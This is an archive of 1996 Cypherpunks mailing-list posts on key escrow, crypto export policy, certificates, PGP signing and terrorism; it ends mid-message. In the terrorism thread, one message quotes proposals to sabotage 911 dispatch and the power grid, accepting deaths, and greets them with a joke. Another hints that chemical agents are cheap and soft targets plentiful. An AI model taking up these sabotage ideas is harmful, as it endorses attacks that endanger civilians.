To: jim bell <cypherpunks@toad.com
Subject: Re: But what about the poor?
Message-ID: <v02140b02adff64f25a67@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell wants to get rich running a key escrow business (:-)
>
>Oh, but what a business opportunity!  I assume a floppy can hold 1000 keys.
>Even if I undercut the going rate of $200 per year by a factor of 10, that's
>a potential income of $20,000 per floppy per year.  A box of 20 floppies on
>the shelf, and I'm set for life!
>
Add in the cost of a bank vault and the ability to provide any key
to an approved law enforcement agency (i.e., one that provides you with
a legitimate search warrant for the key) with a 2 hour response time
(24/7/365). Also, you will have to take in keys as they are provided.

Hmm, the SecureCard (tm) I use to dial into my office system generates
one key per minute. Assume there are a million out there. Assume keys
are 64 bits (8 bytes) + 64 bits of card ID. 16 Mbytes/minute is,
according to the back of my envelope, just under 1/4 mbyte/sec, so each
of those floppy's will fill up pretty quickly, and you'll need a really,
really, big safe to put them in.

Of course, Jim probably knows this.

Martin.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 3 Jul 1996 09:46:32 +0800
To: aba@dcs.ex.ac.uk>
Subject: Re: UK Crypto regs?
In-Reply-To: <199606300840.JAA00124@server.test.net>
Message-ID: <Pine.SUN.3.94.960702165205.6149N-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thank you to AB for forwarding the Ross Anderson summary.

I am unclear on what I consider a key point regarding UK policy.

The US (and Japanese) governments have pledged not to seek to esrow
digital signature keys.  (FWIW I think this is a very important and
praiseworthy pledge.)  There is a large class of DS keys, eg RSA keys,
which can also be used for encryption; there is also a class of keys (eg.
SHA 1, I think?) that cannot.  A PKI that requires escrow therefore must
either

a) limit the type of encryption allowed for DS keys, end exclude one of
the most popular flavors

or 

b) escrow digital signature keys

I am unclear as to whether the UK authorities understand this, and if so
which option they plan to choose.  I would welcome any information that
might be floating around.

[This message may have been dictated with Dragon Dictate 2.01. 
Please be alert for unintentional word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 3 Jul 1996 10:10:13 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: But what about the poor?
In-Reply-To: <2.2.32.19960702103730.00bb4544@panix.com>
Message-ID: <Pine.SUN.3.94.960702171805.6149S-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, Duncan Frissell wrote:

> At 11:25 PM 7/1/96 -0700, Bill Frantz wrote:
> 
> >Current government "Key Escrow" systems cost $200/key/year. [Craig Mundie] 
> >These systems can best be described as key-rental systems.

I bet you it's almost all fixed cost.  

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 12:33:51 +0800
To: cypherpunks@toad.com
Subject: Re: But what about the poor?
Message-ID: <199607030031.RAA12438@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:55 PM 7/2/96 -0700, Martin Minow wrote:
>Jim Bell wants to get rich running a key escrow business (:-)
>>
>>Oh, but what a business opportunity!  I assume a floppy can hold 1000 keys.
>>Even if I undercut the going rate of $200 per year by a factor of 10, that's
>>a potential income of $20,000 per floppy per year.  A box of 20 floppies on
>>the shelf, and I'm set for life!
>>
>Add in the cost of a bank vault

I'm assuming that the keys are, themselves, encrypted.

> and the ability to provide any key
>to an approved law enforcement agency (i.e., one that provides you with
>a legitimate search warrant for the key) with a 2 hour response time
>(24/7/365).

Easy solution!  Make 'em show up at the front door.  It'd cut down on the 
requests, I'd say...    This would be an excellent way of getting around the 
"response time" requirement:  The time the cops take to actually arrive and 
request the key is THEIR time, not that of the escrow agent.  Locate the 
escrow agent in Encampment, Wyoming, and see how many can find it!


> Also, you will have to take in keys as they are provided.

However, this raises an interesting question:  Can key-escrow agents change 
the terms of their operation to delete such responses (or slow them...) for 
the cops?  Or, for that matter, can they charge the cops an arm and a leg 
for the key?  (Say, $100,000 per?)

Another question:  The cops probably assume that the escrow agent is NOT 
going to inform the key holder that the key has been delivered.  But if the 
stated policy of the escrow agent is that the key owner MUST be informed, 
what are the cops gonna do about it? 

Further, how are the cops going to evidence the existence of a valid 
warrant?  (As opposed to a forgery?)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 3 Jul 1996 04:35:48 +0800
To: cypherpunks@toad.com
Subject: Paper: "A Socially based Identity Model"
Message-ID: <199607021542.RAA08948@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

I've written a paper where I introduce a "name spectrum"
as a identity model. The name spectrum has increasing
levels of identification; anyone, anyone with alias,
established pseudonym, well-reputed pseudonym, escrowed
pseudonym, identity and True Name. 

I try to show how law enforcement still can find criminals,
even though they (we) have privacy. I argue that the power
balance between the individual and the law enforcement should 
be approximately the same as it is in ordinary life. I 
talk quite a lot about the analogy between real life and
cyberspace when it comes to power and trust.

I have a suggestion for how to deploy traffic mixers (DCnet)
without tilting the power balance too much to the advantage
of the user as well. I suggest reputation servers where an 
efficient reputation market can be maintained. 

I'd appreciate any comments on the paper. It is still
preliminary, though.

It is available at http://www.it.kth.se/~cwe/phd/ in
a number of formats. 

-Christian Wettergren, cwe@it.kth.se





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@cybercash.com>
Date: Wed, 3 Jul 1996 10:42:40 +0800
To: cypherpunks@toad.com
Subject: Re: Self-signed certificates
Message-ID: <2.2.32.19960702215220.002ff23c@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's some trouble-making I'm doing on another list (one that believes in
X.509 certs and CAs).... :)

 - Carl

>Date: Tue, 02 Jul 1996 17:34:46 -0400
>To: Greg.McPhee@Software.com (Greg McPhee)
>From: Carl Ellison <cme@cybercash.com>
>Subject: Re: Self-signed certificates 
>Cc: ssl-talk@netscape.com

>
>At 01:51 PM 7/2/96 -0700, Greg McPhee wrote:
>>>
>>>If you have encountered an old friend of yours on the net and want to make
>>>sure that you can exchange keys with her without some active eavesdropper
>>>getting in the path and substituting keys, then a CA's cert is probably
>>>worthless to you.  [I have a paper at this month's USENIX Security Symposium
>>>on this subject.]
>>
>>I want to understand why the "CA's cert" above is worthless.  Assuming the
>>"CA's cert" is a self signed certificate identifying a CA, then is it
>>worthless because it is an untrusted CA, or because my old friend and I
>>don't have personal certificates signed by this CA?
>>
>>Couldn't wait for the paper :-)
>
>OK -- at the risk of boring the list... :)
>
>There are many definitions for "identity".  In this one case, I'm using the
>example of an old friend.  We meet again on the net and want to trade keys,
>for private communications.  Much of the loose talk over the years about
>certificates says that if she and I have certificates from a good CA, then
>we can be assured we aren't being spoofed.  That statement isn't true.
>
>To state it more formally, a CA's certificate in this case is neither
>necessary nor sufficient.
>
>The CA binds a key to *its name for a person* -- trying to make that name
>globally unique and meaningful -- but all it can promise is to make the name
>unique.  It can't promise to make it meaningful *to me*.  The CA is not
>aware of my existence, much less of what I know about each person in the
>world.  There might be 100 certificates for "Sue Robinson" -- with various
>other information to distinguish them from one another -- but when I knew
>her she was going under the name of Laura and I have no clue what her other
>distinguishing information is.  I had lost touch with her.
>
>I could ask her, over the net, and she would tell me all those new bits of
>information.
>
>Trouble is, I need an authenticated channel to her in order to be sure I'm
>not being spoofed while she tells me her SNail address (or whatever makes
>her cert unique).  I can't get an authenticated channel without the cert.
>Impasse.
>
>Thus the cert from the CA is not sufficient.
>
>It is also not necessary.  The paper I'm presenting gives a protocol with
>which Sue and I can use our shared memories (what makes us old friends in
>the first place and, in a real sense, the *true* definition of "identity")
>to prove to each other that there is no eavesdropper over a confidential
>channel we create.  Once we've done that, we then we can tell each other our
>keys and each issue a cert for the other's key.  At that point, we have
>certified keys for each other without involving a CA.  What's better, I have
>her certified key from a "CA" I can trust above all others -- myself.
>
>[QED]
>
> - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 3 Jul 1996 11:10:25 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Net and Terrorism.
In-Reply-To: <adfea141010210040a34@[205.199.118.202]>
Message-ID: <199607022253.RAA31595@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> 
> >Another method, and this would be very unpopular (and
> >hypocritical of the US) would be simply to announce that we (the Country)
> >are going to hold the _manufacturing_ nation responcible for the use of
> >weapons of mass destruction. So if Soviet Nerve Gas is used, we gas a
> >city in the Soviet Union. MAD carried to a lower level.
> 
> You are essentially making my point, that the biggest danger of the current
> responses to terrorism is that nations will turn to national terrorism and
> police state tactics.

Khm, have you thought about getting 2,000 nukes in response?

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 3 Jul 1996 06:37:11 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
Message-ID: <adfea141010210040a34@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:58 AM 7/2/96, snow wrote:

>T.C. May wrote:
>
>Can anything be done? To stop the likely effects of lots more
>surface-to-air missiles, lots more nerve gas available on the black market,
>and so on?
>
>In a word, "no."
>/*
>     I disagree. Terrorism, political terrorism is fear. There are ways to
>protect military targets that are quite cost effective, unfortunately they
>are politically unpopular. (What just happend in Saudi is on my mind.
>STUPID military commanders getting the same pie in the face time and time
>again. There is NOTHING so unchanging as the military mind set.)

Well, attacks on military targets are almost, by definition, not
"terrorism." (I'll spare the list a debate about the semantics; U.S.
journalists tend to refer to anything done to "us" as "terrorism," whether
the target is military or civilian.)

The focus of my comments was really on civilian or non-military targets.
(Including destruction of government buildings, maybe. I'm not sure whether
the Oklahoma City bombing and the recent Phoenix/Viper Militia case is
"terrorism" in a formal sense, or counter-government action, but my point
is that such things are likely to be happen.)

>Civilian targets are harder to protect, but certain steps can be
>taken to lessen chances of a sucessful attack.

Sure, any particular "soft target" can be hardened to some extent. But not
all of them, and even harder sites can be reached. This is left as an
exercise for the reader.

(Hint: The Japanese cult's Sarin gas attack on the subways...there are tens
of thousands of comparable targets in the U.S. alone. Look around, and ask
what it would take to harden each one. A minor cryptographic connection is
that hardening N of M sites makes the remaining M - N sites all the more
tempting.)

>Another method, and this would be very unpopular (and
>hypocritical of the US) would be simply to announce that we (the Country)
>are going to hold the _manufacturing_ nation responcible for the use of
>weapons of mass destruction. So if Soviet Nerve Gas is used, we gas a
>city in the Soviet Union. MAD carried to a lower level.

You are essentially making my point, that the biggest danger of the current
responses to terrorism is that nations will turn to national terrorism and
police state tactics.


>A third option is quite simply to buy as much of it as possible.

No, wouldn't work. As with the "War on (Some) Drugs," all this does is
raise the price a bit, actually making it a more tempting market for many
to get into.

(And various CBW agents are incredibly cheap to make, with the precursors
available in common products. How ya gonna buy up all the peach pits, for
example? Or "buy up" all the fertilizer and fuel oil?)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@XENON.chromatic.com>
Date: Wed, 3 Jul 1996 12:49:59 +0800
To: cypherpunks@toad.com
Subject: Ken Bass: Wire tap only useful for conviction (Was: SAFE Forum--some comments)
In-Reply-To: <adfea59d02021004104f@[205.199.118.202]>
Message-ID: <199607030102.SAA05930@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> And here I'll comment on Ken Bass's excellent comments (there were many
> excellent points).
> 
> He pointed out that the driving force for crypto policy is probably the
> _law enforcement_ camp, not the _intelligence agency_ camp.

Ken pointed out that law enforcement had to have gotten enough
evidence prior to a wire tap request to show probable cause.
If this is the case, then the only usefulness of wire taps is
to improve the likelihood of conviction and not the detection
of potential terrorist (or child molestation or your favorite
bad guy) plots.

Therefore, it is important to cut through the rhetoric and to
challenge Reno and Freeh and others when they spout such non-sense,
unless they are foreshadowing an Orwellian state (where you might
as well expect a camcorder in every bedroom.  After all, the most
common case of child abuse/molestation/spousal abuse is in the
home.  Better protect the public!)

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 12:52:48 +0800
To: snow <cypherpunks@toad.com
Subject: Re: Net and Terrorism.
Message-ID: <199607030107.SAA14488@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:13 PM 7/2/96 -0500, snow wrote:
>On Tue, 2 Jul 1996, snow wrote:
>> Cause disturbances in certain parts of certain cities, then attack
>> the 911 system to route officers and firemen to _wealthy_ neigborhoods at
>> the expense of the poor neighborhoods. Then complain to the papers about
>> it. 
>> 
>> Gain control of the power grid (I don't know how possible this is)
>> and selectively brown out certain sections of the city during peak demand
>> periods. Make it obvious, then do the preceeding idea.  
>> 
>> In all of these people will, or could die, but are much more
>> effective in undermining the faith people have in the structures that run
>> the country. If a bomb blast goes off, people get pissed off at the bomb
>> makers, if the power fails, people get pissed at the electrical company.
>> If you can create a large enough disturbances they will be better than
>> bombs.

Hey, great job Chris!  Saw the news reports on the national news!  B^)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 3 Jul 1996 09:30:05 +0800
To: cypherpunks@toad.com
Subject: SAFE Forum--some comments
Message-ID: <adfea59d02021004104f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I was at the "SAFE" forum yesterday. Too many things to report on, so I'll
just add comments here and there.

And here I'll comment on Ken Bass's excellent comments (there were many
excellent points). Bass is a D.C.-area lawyer with the prestigious Venable
law firm (the venerable Venable firm?), and a former Reagan Administration
official.

He pointed out that the driving force for crypto policy is probably the
_law enforcement_ camp, not the _intelligence agency_ camp. And that the
NSA is regretting the ITAR stuff, as it has sparked an "arms race" to
develop stronger crypto. Bass noted that people now equate permission to
export with weakness, and that had the U.S. not restricted exports, users
probably would've been "fat, dumb, and happy" to keep using breakable
crypto.

(Many interesting points to make. Bass is no supporter of Clipper and
Escrow, and made many points about why the policy won't work. His later
dialog with Michael Froomkin and Jerry Berman, about the constitutionality
of crypto laws was a highpoint for me.)

His comments fit in with the points made by Diffie that the 40 bit
restriction is unlikely to satisfy either the user community or the
surveillance community. 40 bits is too weak for a targetted attack, but too
strong for "vacuum cleaner" intercepts such as NSA SIGINT uses. (Diffie
also gave an excellent summary of cryptographic work factors, using 30
bits, 60 bits, 90 bits, and 120 bits as examples. For example, 30 bits
needs about a billion operations to brute force, which any modern PC can do
in several seconds. 60 bits is a billion times harder, which NSA machines
can handle, and 90 bits is beyond current capabilities...)

I said I wouldn't do a summary, but I'll make a few comments:

-- Both Congresswimmin, Eshoo and Lofgren, seemed genuinely interested in
the issues

-- Senator Leahy, on t.v. from Vermont, emphasized _privacy_ and made the
Cypherpunk/libertarian/ACLU point that he and his neighbors are not
criminals and don't think the government has any right to demand that
communications, computer files, diaries, and the like be "escrowed."

-- Senator Conrad "I ain't no Democrat" Burns was there in person and was
entertaining and strongly blasted key escrow and the ITAR restrictions. I
found his comments refreshing.

-- The whole affair was "preaching to the choir," as many speakers noted.
That is, there was little controversy and little disagreement. This was a
point made nicely by Phil Zimmermann, who told a humorous story of  going
to Congressman Dana Rohrabacher's office, seeing the picture of Ollie North
on the wall (much laughter), but finding Rohrabacher's staffers aghast at
the crypto laws and ITARs. Then, Phil took a hotel shuttle and ended up
talking to the driver, who was also aghast. "Where else can you find this
kind of consensus?"

(A point many of us have made as well, that nearly everyone who has the
issues explained to them comes down on the side that the government has no
right to tell us we can't use codes and ciphers, that it's all similar to
Big Brother demanding video cameras in our homes....)

-- Craig Mundie, currently of Microsoft, made excellent points about the
costs of a key escrow infrastructure. (By the way, those who read "The Soul
of a New Machine" should be interested that Mundie was the leader of the
North Carolina research facility of Data General that lost the "shootout at
HoJos." If this means nothing to you, read the Kidder book--soon!)

-- Michael Froomkin, a law professor (and member of our list of course),
pointed out despite the various constitutional issues, the crypto laws are
mostly having their desired effect, namely, slowing the deployment of
crypto and creating confusion. (That Windows 95 has no crypto modules, and
that most browsers and mail programs have nothing built in tells us that
the FUD worked.)


In summary, for me the SAFE forum was a success. Though it was periods of
boring platitudes we all agreed with interspersed with good insights from
the speakers and audience. Not much that was new to a Cypherpunk, of
course. (In fact, the forum was almost a kind of Cypherpunks physical
meeting, in terms of the topics, and in terms of who attended....it was
even where we've been having recent physical meetings.)

A day well spent.

--Tim May




Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 3 Jul 1996 13:55:01 +0800
To: Lile Elam <tcmay@got.net
Subject: Re: SAFE Forum--some comments
Message-ID: <199607030157.SAA17571@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:47 PM 7/2/96 -0700, Lile Elam wrote:
>The comment I kept hearing over and over was that we have to 
>educate the public about what cryptography is and why it's important
>to everyone using computers to communicate. This public includes
>people who are not on the net and those who don't even know what the 
>Internet is. 

Absolutely!  The image of postcards vs. letters may be the most effective
metaphor.


>     www.art.net

Check it out.  Well worth the visit.  (And if, like me, you are limited to
28.8, well, you can practice your Zen.)


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Wed, 3 Jul 1996 14:00:37 +0800
To: "'tcmay@got.net>
Subject: RE: Net and Terrorism.
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960703020700Z-43229@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	tcmay@got.net
>
>
>"Alien spaceship images will appear in thousands of darkened rooms and
>will trigger mass hysteria."
...............................................................


Scheduled for July 4th, "at a theater near you".


>    ..
>Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 3 Jul 1996 14:27:49 +0800
To: "David F. Ogren" <cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <199607030207.TAA18393@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:43 PM 7/2/96 -0400, David F. Ogren wrote:
>I've noticed recently that two PGP programmers (Mr. Zimmerman and Mr. 
>Atkins) do not seem to PGP clearsign their messages to this list. In fact, 
>a surprisingly small percentage of messages on the C-punk list are signed. 
>This despite the fact that the average subscriber is at least literate in 
>PGP.
>
>Does anybody have any speculation on why this is?

I want implausible deniability for the mistakes I make.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Wed, 3 Jul 1996 15:47:58 +0800
To: "'cypherpunks@toad.com>
Subject: RE: fbi botches intel "ecspionage" case
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960703021250Z-43238@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Black Unicorn
>
>On Sat, 29 Jun 1996, Vladimir Z. Nuri wrote:
>
>> 3. hence, one wonders if the FBI could do a better job of
>> combating ecspionage
>
>I believe you mean economic intelligence here, not economic espionage,
>or
>industrial espionage, or "ecspionage."
...............................................................


One day in a future galaxy, "ecspionage" will involve locating
"flits".....


    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@myriad.alias.net>
Date: Wed, 3 Jul 1996 14:23:33 +0800
Subject: Re: Sameer on C-SPAN
In-Reply-To: <199607020123.UAA19678@alpha.jpunix.com>
Message-ID: <199607030242.TAA13879@myriad>
MIME-Version: 1.0
Content-Type: text/plain


bluebreeze@nym.jpunix.com (Blue Breeze) wrote:
>
> Not everything. No picture of Sameer!? That's what I'd like to see.

There's one in the latest WebSmith magazine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Wed, 3 Jul 1996 12:32:09 +0800
To: cypherpunks@toad.com
Subject: Lack of PGP signatures
Message-ID: <199607022343.TAA21050@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Jul 02 19:40:44 1996

I've noticed recently that two PGP programmers (Mr. Zimmerman and Mr. 
Atkins) do not seem to PGP clearsign their messages to this list. In fact, 
a surprisingly small percentage of messages on the C-punk list are signed. 
This despite the fact that the average subscriber is at least literate in 
PGP.

Does anybody have any speculation on why this is?

Is it because people consider mundane mail unimportant enough to sign?

Is it because the members of this list are more concerned with encryption 
than authentication?

Is it because most mail programs are not PGP aware?

Is it because of the weaknesses in MD5?
David F. Ogren                |
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMdmzfeSLhCBkWOspAQEdaAf7BzkKqxVyzBY4TAKoSXqO2DhFpceMGfv1
WJhMXHCi9FnZuCHs2hl03vhf/DReX1Y6YWU9ntLhpO8kY6eDeRdq/M9eyD/le1df
lZXewrfWrv/JSQgDEmUgao01EkVCVILAx/mUzeBTYPx0nx4CVKUw5pCOJvcO4oVs
Y9K1w7ivSpVtwvonYSrqWjT3qDDXm2aCID+YlffH2c+nDBXPgv094fj5Fzzoi+4i
sS8u/otxz8d2A+NlhqKJZWxkPtBi0AA2VO6L2Mx8ZmlwRWaD4EiTjaozusPq5GoE
tEh9YIPt4+CJZTiLwRRh1x+OqWIDQOJMcDlLmNhiYxFYuevWhmbLPA==
=/E0F
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Wed, 3 Jul 1996 13:31:58 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: The Net and Terrorism
Message-ID: <2.2.32.19960703005232.009d18e4@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 03:44 PM 6/30/96 -0700, you wrote:

>in reality. it seems to me no nation-state has ever experimented with
>trying to take away the root causes of violence and discontent. 

But here in the U.S., we ARE trying to take them away via the educational
system.  About the only thing we can effectively do is to provide more
educational opportunities that denounce violence, racism, hate crimes, etc.
However, you cannot eliminate discontent without eliminating greed; which is
simply not possible.

Even so, there are a couple of problems with even attempting "to take away
the root causes", not the least of which is the Constitutionally protected
right to free speech.  I am allowed to teach my kid to hate anyone for any
reason.  I can blame this or that group for this set of troubles, and that
the best way to deal with this is not only to scare them away, but to kill
as many of them as possible.  It may be morally repugnant, but it is
protected speech.

The countries that sponsor terrorists have not been noted for their
successful educational systems.  And they certainly are not going to listen
to Western discussions on how best to solve their "problems".

Do you still not accept that we have a world that contains people who exist
in conditions that foster and breed terrorists?

If not, look at some more concrete examples.  Have you ever met an Islamic
fundamentalist?  How about a Christian fundamentalist?  There really is no
difference between them, other than the specific quotations that exit their
pre-programmed mouths.  When religion enteres the picture, no amount of
logic will convince the true believers that they are acting destructively.

Even moderately regligious Christians (the people to whom I have been most
exposed) have very strong beliefs that X is the word of God, and therefore
not subject to question.  When this is some destructive (yet not obvious as
such) statement, such as "Go forth and multiply", no amount of education or
logic will convince them that Zero Population Growth is a good thing.

I'm sure you can multiply this into all sorts of destructive behavior
preached locally, such as the Southern Baptist preachers who refuse to
denounce the maltreatment of blacks or the burning of black churches.  There
is no force of law that can alter this behavior.

My point here is that this behavior is explicitly protected by the Bill of
Rights.

So, do you not accept that we have the environment right here that can breed
violence and discontent?

For the most part, I see kids today being educated with much less "hatred"
than even my age group was brought up with (I'm 34).  We're moving in the
right direction by incorporating diversity in education, entertainment and
the workplace, but we can never hope to erase it all.  And if even one
person retains the seed of violence, they can employ the "warfare of the
weak" -- terrorism.

>or that they are worth the money. terrorists invariably have a 
>patricular pathological psychological profile that sees the world
>in terms of "martyrs vs. villians" with the villians in the government,
>and the villians taking away or abusing respectable citizens.

So your point here is one of *agreement* that human nature will produce
psychological profiles of people who commit acts of terror.

>the "problem" of terrorism will be solved when we take the view
>that insanity and violence is *not* 
>a natural aspect of human behavior (as TCM tends to suggest), 

Even in spite of your argument above?

Violence is here.  It's been present since recorded history.  We've gotten
pretty good at it, actually.  I think the record speaks pretty clearly that
violence continues to be a part of human behavior, despite any efforts made
to stop it.

>and that
>there are specific environmental conditions that breed it. like
>malaria, if you take away the swamplike breeding grounds, you will
>largely remove it. such a thing is a radical hypothesis, but one that
>nonetheless has never really been tested in practice.

As I said above, we can reduce some of the breeding grounds, but we can not
eradicate them all.  And if one were to conduct a study correlating racist
attitudes with education with numbers of acts of terror, we might find a
direct correlation.

The U.S. has a level of tolerance for diversity that I only recently came to
appreciate.  We hosted a foreign exchange student from Scotland (hardly
culture shock to him), but he surprised me when he commented on how
surprised he was that different groups of people were mixed together --
black kids hanging out with white kids, catholics and protestants being
friends, the sort of thing that I take for granted every day.

He expected the subtle racism of home.  And lets just say that Great
Britain's culture is probably closer to ours than any other country.

I am more than willing to agree with you that elimination of hatred and
prejudice will go farther than any law enforcement measures to reduce
terrorist acts.  However, my point, and I believe this is Tim's point, too,
is that it will *never* eliminate these acts, and that there must be other
ways of dealing with the problems that occur.

>>I'm not advocating such "terrorism," by the way, merely telling it like it is.
>ah yes, the standard amusing TCM disclaimer. hmmm, your signature suggests
>otherwise.

This personal attack was completely unwarranted.  Are you suggesting that
Tim is a sponsor of terrorist attacks, or that he approves of the repeatedly
demonstrated governmental penchant for violating our privacy whenever
convenient?  There was no point to making this statement, other than to
foster discontent.

>>(Remember, terrorism is just warfare carried on by other means, with
>>apolgies to Von Clausewitz.)
>disagree. the purpose of warfare has traditionally been to seize

I completely disagree with you here.  Terror has all the same purposes as
general-purpose warfare:  it's simply being carried out by a smaller group,
without the resources available to an entire government.

Look at the Irish Question:  they want independance from a government they
deem undesirable.  Look at the arabian terrorist bombings of Americans in
Saudi Arabia, Lebanon, etc.:  they want to drive the U.S. Army out.
Likewise, the bombing of the Murrah building in OK was a "military" target:
it housed the agencies that some small group percieved to be responsible for
the attack on Waco.  Even the church building burnings happening across the
southern U.S. appear to have a specific objective:  to frighten the victims;
and if the victims left the area, the terrorists would have accomplished
their objectives.

No hidden purposes here:  these are all military actions being carried out
by groups that are simply not in a position to negotiate.   It is "warfare
by the weak".

You may think that you hold every answer to terrorism in your hand, that
hugs and kisses before bedtime will make the evil monsters under the bed go
away.    The point of Tim's essay was that, yes, the net can be used by the
evil monsters, and yes, the evil monsters are here, and no, the evil
monsters are not going away any time soon.  Why did you feel it necessary to
try to slam his fairly well-researched and quite obvious conclusion?

John
--
J. Deters
>From Senator C. Burns' Pro-CODE bill, which I support and you can find at:
http://www.senate.gov/member/mt/burns/general/billtext.htm
"  (2) Miniaturization, disturbed computing, and reduced transmission
 costs make communication via electronic networks a reality."
+---------------------------------------------------------+
| NET:     jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:    1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)     |
| PGP Key ID:  768 / 15FFA875                             |
+---------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 3 Jul 1996 12:24:53 +0800
To: cypherpunks@toad.com
Subject: LE Risks with No Crypto
Message-ID: <2.2.32.19960703002028.00ba3b24@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone notice the fun little bit in the story of the bust of the Viper
Militia in Arizona?

The state employee that BATF sent to infiltrate the group almost "assumed
room temperature" because an ally of the Militia working for AT&T pulled his
